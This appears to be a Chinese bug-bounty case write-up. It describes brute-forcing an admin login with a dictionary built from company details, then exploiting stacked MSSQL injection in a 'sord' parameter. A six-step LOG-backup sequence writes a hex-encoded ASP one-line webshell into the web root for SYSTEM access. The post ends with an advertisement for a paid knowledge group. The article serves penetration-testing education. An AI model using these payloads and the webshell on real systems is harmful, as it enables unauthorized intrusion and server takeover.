01
🔒 #SRC漏洞#攻防案例 #直播 #技术分享 🔍,关注公众号,设为星标,不错过每次直播!往期部分直播录屏可见B站:长风安全
02
案例
首先来到登录口
推荐大家一个工具(工具链接见文末):
收集一切可用信息,比如域名、公司名称拼音、公司名称缩写、邮箱、JS里面找开发者名字等等,然后生成字典进行爆破。
这里我是用域名生成的社工字典,运气很好(艹),字典里面的第一个密码就进后台了
由于该项目只收高危,且只收权限类、数据类漏洞,因此直接跳过逻辑类漏洞的测试,直奔SQL注入
数据包如下
burp跑了一下payload,发现sord参数存在 mssql 的堆叠延时
上工具梭哈
这个后台多个接口,多个参数存在 mssql 的堆叠注入,由于比较简单,就不写了。
mssql getshell的方式多了,前两种是比较常用的,但是这里的sql注入没有回显,ping dns又没有反应(可能不出网),所以这里用到的是LOG备份写shell
既然要写shell,那肯定就需要知道绝对路径,怎么找?(直播说过)
这个后台还发现了两个任意文件读取漏洞,利用该漏洞读取IIS配置文件,得到了网站的绝对路径
IIS配置文件地址在:
C:/Windows/System32/inetsrv/config/applicationHost.config
踩坑
OK,知道了绝对路径,那就开始写shell
第一步:
sord=asc;create database dbtest11; --
第二步:
sord=asc;alter database dbtest11 set RECOVERY FULL; --
第三步:
sord=asc;create table dbtest11..tmd (a image); --
第四步:
sord=asc;backup database dbtest11 to disk = 'C:\Device\11.asp'; --
第五步:往表中插入一句话木马
insert into dbtest11..tmd (a) values (0x3C25657865637574652872657175657374282261222929253E);
第六步:进行LOG备份,将shell导出到网站根目录
sord=asc;backup log dbtest11 to disk = 'C:\Device\12.asp' with init; --
使用蚁剑连接
system权限
看了下arp列表证明了危害,不敢动,最后将webshell删除(一定要记得)。
03
关于知识库&知识星球
SRC&众测漏洞:更新团队日常挖到的漏洞案例并配套直播或录屏讲解(不论简单或复杂的),接收投稿,给予现金奖励。
攻防案例:更新团队攻防案例并配套直播或录屏讲解,接收投稿,给予现金奖励。
知识干货:更新日常总结的一些经验、干货、工具
目前星球包含:
内部&公开直播录屏
SRC、众测、渗透测试、攻防实战案例
渗透测试、红队相关原创知识笔记
今年将会新增车联网相关内容
Wiki部分内容展示:
球友评价:
加入星球&知识库-两种方式二选一
1.免费加入:原创文章投稿
0x01 SRC实战报告类型≥2篇,非水文
0x02 其余类型≥1000字,非水文
以上两种投稿方式任选其一满足即可免费加入
建议:对于原创文章投稿,请确保内容独特、丰富,并且排版整齐。如果你是新手或者尚未深入了解领域知识,请在投稿前慎重考虑是否符合要求。我们期待收到的投稿是具有学习意义,能够为师傅们带来价值。感谢您的理解与配合。
2.付费加入:现价239元,价格随内容和人数增长而适当提高
加入联系(备注来意):
文中工具地址:
https://github.com/kkbo8005/dicttools#/
https://github.com/zgjx6/SocialEngineeringDictionaryGenerator